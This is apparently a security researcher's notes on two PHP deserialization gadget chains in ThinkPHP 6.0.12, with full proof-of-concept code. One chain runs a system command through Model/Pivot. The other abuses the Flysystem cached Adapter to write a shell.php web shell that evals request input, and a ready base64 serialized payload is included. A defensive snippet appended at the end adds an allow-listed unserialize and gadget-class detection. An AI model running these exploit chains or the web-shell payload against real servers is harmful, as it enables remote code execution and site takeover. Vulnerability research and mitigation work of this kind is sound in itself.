Finding deserialization chains in ThinkPHP 6.0.12 LTS


As before

Searching the framework, I found that it contains two usable __destruct functions. The chain I had always used before is the one triggered from vendor/topthink/think-orm/src/Model.php:1063.


Pivot is the only concrete subclass of Model, so Pivot ends up being the trigger point.

POC1:

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['dir']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

Adapter

Besides that one, I also noticed another __destruct function. Its code is simple and the call chain short, so I followed it directly and found that it does work; let's go through it below.

(This chain has appeared online many times, but I had always just copied and pasted it without paying attention. Now that I have stumbled onto it myself, I am writing it down as ThinkPHP study notes.)

vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php:28


Stepping into it, I found that this one is indeed feasible, even though many classes implement save afterwards.


In fact, only \League\Flysystem\Cached\Storage\Adapter::save is usable; all the others are database cache handling and cleanup work. Below is the code of Adapter::save.

    /**
     * {@inheritdoc}
     */
    public function save()
    {
        $config = new Config();
        $contents = $this->getForStorage();
        if ($this->adapter->has($this->file)) {
            $this->adapter->update($this->file, $contents, $config);
        } else {
            $this->adapter->write($this->file, $contents, $config);
        }

    }

This chain is feasible and not complex, so I constructed a POC for it (tested, works).

POC2:

<?php
namespace League\Flysystem{
    interface ReadInterface
    {
    }
}
namespace League\Flysystem\Cached{
    use League\Flysystem\ReadInterface;

    interface CacheInterface extends ReadInterface
    {
    }
}
namespace League\Flysystem\Cached\Storage{
    use League\Flysystem\Cached\CacheInterface;

    abstract class AbstractCache implements CacheInterface
    {

    }
}

//--------------------------------------------------
namespace League\Flysystem{
    interface AdapterInterface extends ReadInterface
    {
    }
}
namespace League\Flysystem\Adapter{
    use League\Flysystem\AdapterInterface;
    abstract class AbstractAdapter implements AdapterInterface
    {
    }
    use League\Flysystem\Config;
    class Local extends AbstractAdapter
    {
        public function write($path, $contents, Config $config)
        {
            // TODO: Implement write() method.
        }

        public function writeStream($path, $resource, Config $config)
        {
            // TODO: Implement writeStream() method.
        }

        public function update($path, $contents, Config $config)
        {
            // TODO: Implement update() method.
        }

        public function updateStream($path, $resource, Config $config)
        {
            // TODO: Implement updateStream() method.
        }

        public function rename($path, $newpath)
        {
            // TODO: Implement rename() method.
        }

        public function copy($path, $newpath)
        {
            // TODO: Implement copy() method.
        }

        public function delete($path)
        {
            // TODO: Implement delete() method.
        }

        public function deleteDir($dirname)
        {
            // TODO: Implement deleteDir() method.
        }

        public function createDir($dirname, Config $config)
        {
            // TODO: Implement createDir() method.
        }

        public function setVisibility($path, $visibility)
        {
            // TODO: Implement setVisibility() method.
        }

        public function has($path)
        {
            // TODO: Implement has() method.
        }

        public function read($path)
        {
            // TODO: Implement read() method.
        }

        public function readStream($path)
        {
            // TODO: Implement readStream() method.
        }

        public function listContents($directory = '', $recursive = false)
        {
            // TODO: Implement listContents() method.
        }

        public function getMetadata($path)
        {
            // TODO: Implement getMetadata() method.
        }

        public function getSize($path)
        {
            // TODO: Implement getSize() method.
        }

        public function getMimetype($path)
        {
            // TODO: Implement getMimetype() method.
        }

        public function getTimestamp($path)
        {
            // TODO: Implement getTimestamp() method.
        }

        public function getVisibility($path)
        {
            // TODO: Implement getVisibility() method.
        }
    }
}
//--------------------------------------------------
namespace League\Flysystem\Cached\Storage{
    use League\Flysystem\AdapterInterface;
    use League\Flysystem\Adapter\Local;
    class Adapter extends AbstractCache
    {
        public function __construct(){
            $this->autosave=false;
            $this->cache=array('<?phpinfo();eval($_REQUEST[0]);?>');
            $this->file="shell.php";
            $this->adapter=new Local();
        }
    }
}
namespace {
    use League\Flysystem\Cached\Storage\Adapter;
    print_r(
        base64_encode(
            serialize(
                new Adapter()
            )
        )
    );
}
//TzozOToiTGVhZ3VlXEZseXN5c3RlbVxDYWNoZWRcU3RvcmFnZVxBZGFwdGVyIjo0OntzOjg6ImF1dG9zYXZlIjtiOjA7czo1OiJjYWNoZSI7YToxOntpOjA7czozMzoiPD9waHBpbmZvKCk7ZXZhbCgkX1JFUVVFU1RbMF0pOz8+Ijt9czo0OiJmaWxlIjtzOjk6InNoZWxsLnBocCI7czo3OiJhZGFwdGVyIjtPOjMwOiJMZWFndWVcRmx5c3lzdGVtXEFkYXB0ZXJcTG9jYWwiOjA6e319

After execution a shell.php file is written.

In summary

Both chains write code through a save function, and in both cases only a single path is feasible afterwards, so there is not much room for further extensions or variants.

The destructors of the following two trigger classes serve as the starting points:

  1. \League\Flysystem\Cached\Storage\Adapter
  2. \think\model\Pivot

Note: I also looked for __wakeup gadgets but found nothing useful...
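As an added defensive example (not code from the original post or from ThinkPHP/Flysystem), the following shows how an application can neutralise both chains above on the receiving side: deserializing with an explicit allowed_classes list so gadget objects are never instantiated, plus a pre-check that flags serialized blobs naming the two trigger classes for logging. The allow-list, the function names and the sample payload are constructed assumptions.

```php
<?php
// Added example (not from the original post): two defensive layers for
// untrusted serialized input in a ThinkPHP/Flysystem application.
//   1. unserialize() with 'allowed_classes': any class not on the list is
//      materialised as __PHP_Incomplete_Class, which has no __wakeup and no
//      __destruct, so neither the Pivot nor the Adapter chain can start.
//   2. a cheap pre-check that reports which known gadget classes a blob names,
//      so the attempt can be logged before anything is parsed.
// The allow-list and the sample payload below are constructed assumptions.

const GADGET_DESTRUCT_CLASSES = [
    'League\Flysystem\Cached\Storage\Adapter',
    'think\model\Pivot',
];

/** Class names a serialized string would instantiate (every O:len:"Name" token). */
function serializedClassNames(string $blob): array
{
    preg_match_all('/O:\d+:"([^"]+)"/', $blob, $m);
    return array_values(array_unique($m[1]));
}

/** Detection: known destructor gadget classes present in the blob, if any. */
function findGadgetClasses(string $blob): array
{
    return array_values(array_intersect(serializedClassNames($blob), GADGET_DESTRUCT_CLASSES));
}

/** Mitigation: deserialize with an explicit allow-list (empty = no objects at all). */
function safeUnserialize(string $blob, array $allowed = [])
{
    return unserialize($blob, ['allowed_classes' => $allowed]);
}

// Constructed sample with the same shape as POC2's output but harmless contents.
$sample = 'O:39:"League\Flysystem\Cached\Storage\Adapter":2:{s:4:"file";s:9:"shell.php";'
        . 's:7:"adapter";O:30:"League\Flysystem\Adapter\Local":0:{}}';

$hits = findGadgetClasses($sample);
if ($hits !== []) {
    error_log('serialized input names gadget classes: ' . implode(', ', $hits));
}

$obj = safeUnserialize($sample);                  // allow-list empty: nothing instantiated
var_dump($obj instanceof __PHP_Incomplete_Class); // bool(true): no __destruct can fire
```

With a real allow-list, pass only the plain data classes the application expects; the gadget classes above must never appear in it.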
